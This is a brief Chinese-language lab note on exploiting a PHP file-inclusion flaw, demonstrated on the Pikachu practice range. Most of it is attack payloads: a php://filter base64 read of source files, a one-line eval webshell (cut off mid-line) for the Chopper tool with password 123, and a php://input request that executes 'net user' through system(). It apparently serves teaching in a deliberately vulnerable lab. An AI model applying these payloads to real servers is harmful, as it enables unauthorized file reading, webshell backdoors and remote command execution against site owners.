包含漏洞可以读写文件以及执行命令
最好转化为base64,防止有特殊字符显示不出来
php://filter/read=convert.base64-encode/resource=【文件名】
用pikachu靶场演示: 读一下当前展示的这个PHP内容
写入一句话木马 我用的是菜刀马 <?php @eval(
用菜刀连接:连接密码 123 由于是在当前文件夹写入的木马文件,所以是在fi_remote.php 同一目录下的
需要修改一个地方 参数等于文件的地方 要改成 php://input
比如 http://192.168.56.128/pikachu/vul/fileinclude/fi_local.php?filename=file1.php
修改 http://192.168.56.128/pikachu/vul/fileinclude/fi_local.php?filename=php://input
提交数据包为:<?php system('net user');?>